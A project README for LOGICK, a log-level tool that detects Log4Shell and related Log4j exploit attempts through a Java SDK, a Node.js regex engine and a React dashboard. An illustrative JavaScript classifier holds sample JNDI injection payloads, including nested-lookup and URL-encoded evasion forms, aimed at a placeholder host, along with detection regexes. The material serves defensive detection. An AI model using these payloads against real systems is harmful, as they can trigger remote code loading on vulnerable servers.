Team INSPIRE Organization: (Link)
LOGICK is a log-level security monitoring tool designed to detect Log4Shell and related Log4j exploit attempts directly from application logs. Instead of relying on network-level monitoring, LOGICK works where the attack actually appears — inside logs — allowing early detection of malicious payloads before serious damage occurs.
LOGICK provides a lightweight SDK that integrates with Java applications using Log4j. The SDK automatically captures logs, securely sends them to the LOGICK backend, and analyzes them using a regex-based detection engine to classify logs as safe, suspicious, or malicious. The results are displayed in a centralized dashboard for real-time monitoring and investigation. Malicious IPs are blocked and are also displayed on the dashboard.
This project demonstrates how legacy Java applications can be protected using log-level monitoring without modifying existing business logic.
- LOGICK SDK: A Java SDK published to Maven Central that integrates directly with Log4j-based applications. It captures logs and securely forwards them to the backend.
- LOGICK Backend Server: A Node.js server that receives logs, analyzes them using a regex detection engine, and stores structured results.
- Detection Engine: A regex-based signature detection engine that identifies Log4Shell payloads, including obfuscated and nested JNDI exploit patterns.
- Dashboard: A React-based web dashboard that visualizes logs, shows attack statistics, and helps users monitor application security in real time.
- Log4j Simulation Environment: A controlled vulnerable application used to simulate Log4Shell attacks and validate detection capability.

- The application integrates the LOGICK SDK.
- The SDK captures logs automatically from Log4j.
- Logs are securely sent to the LOGICK backend server.
- The detection engine analyzes logs using exploit signatures.
- Logs are classified as safe, suspicious, or malicious.
- Results are displayed in the LOGICK dashboard.
- Malicious IPs are blocked and displayed on the dashboard.
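
An added example, not taken from the LOGICK code base, of how a regex-based engine can classify log lines as safe, suspicious, or malicious, including nested and URL-encoded JNDI lookups. The function names, the three-tier rule, and the sample log lines are assumptions made for illustration.

```javascript
// Added illustration: not LOGICK's signatures. All names here are hypothetical.

// ${lower:x} and ${upper:x} resolve to their own argument, so they can hide "jndi".
const PASSTHROUGH = /\$\{(?:lower|upper):([^${}]*)\}/gi;
// ${anything:-x} resolves to the default value x when the key is unset.
const DEFAULT_VALUE = /\$\{[^${}]*:-([^${}]*)\}/g;
const JNDI_LOOKUP = /\$\{\s*jndi\s*:/i;
const ANY_LOOKUP = /\$\{[^}]*:/;

// URL-decode when possible; a stray "%" in a log line must not abort analysis.
function safeDecode(text) {
  try { return decodeURIComponent(text); } catch { return text; }
}

// Collapse nested lookups innermost-first until the text stops changing.
function normalize(line) {
  let current = safeDecode(line);
  for (let pass = 0; pass < 10; pass++) { // bounded: input is attacker-controlled
    const next = current.replace(PASSTHROUGH, '$1').replace(DEFAULT_VALUE, '$1');
    if (next === current) break;
    current = next;
  }
  return current;
}

function classify(line) {
  const normalized = normalize(line);
  if (JNDI_LOOKUP.test(normalized)) return 'malicious';
  if (ANY_LOOKUP.test(normalized)) return 'suspicious';
  return 'safe';
}

// Constructed sample log lines (example.invalid is a reserved, unroutable name).
const SAMPLE_LINES = [
  'GET /index.html 200 user=alice',
  'User-Agent: ${env:HOSTNAME}',
  'User-Agent: ${jndi:ldap://example.invalid/a}',
  'User-Agent: ${${lower:j}ndi:ldap://example.invalid/a}',
  'q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D',
];
for (const line of SAMPLE_LINES) console.log(classify(line).padEnd(10), line);
```

Normalizing before matching lets a single `${jndi:` signature cover the nested forms; lookups not listed in `PASSTHROUGH` fall through to `suspicious` rather than being ignored.
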
| Repository | Description |
|---|---|
| LogicK-NodeJs-Server | Backend server for authentication, log ingestion, and analysis |
| LogicK-sdk | Java SDK that integrates with applications and sends logs |
| logick-dashboard | Frontend dashboard for monitoring and visualization |
| lo4j-simulation | Vulnerable Log4j application used to simulate exploit attacks |

Refer to the architecture diagram to understand how LOGICK components interact, including SDK integration, backend analysis, database storage, and dashboard visualization.
Architecture Diagram of LOGICK
Full technical documentation, SDK usage, architecture details, and detection engine explanation are available in the LOGICK GitBook.
GitBook Documentation: (Link)
LOGICK SDK: (Link)
Watch the complete demo showing exploit simulation, detection, and dashboard monitoring.
Demo Video: (Add your YouTube demo link here)
The LOGICK dashboard provides:
- Real-time log monitoring
- Attack detection visibility
- Malicious log identification
- Security analysis metrics
- Throttled IP details
- Detects Log4Shell exploit attempts in real time
- Lightweight Java SDK integration
- Regex-based signature detection engine
- Centralized log monitoring dashboard
- Secure authentication using client credentials
- Published SDK via Maven Central
- Designed for legacy Java application environments
LOGICK focuses on early detection at the log level, turning silent exploit attempts into visible alerts and helping organizations monitor vulnerable applications without requiring immediate patching.



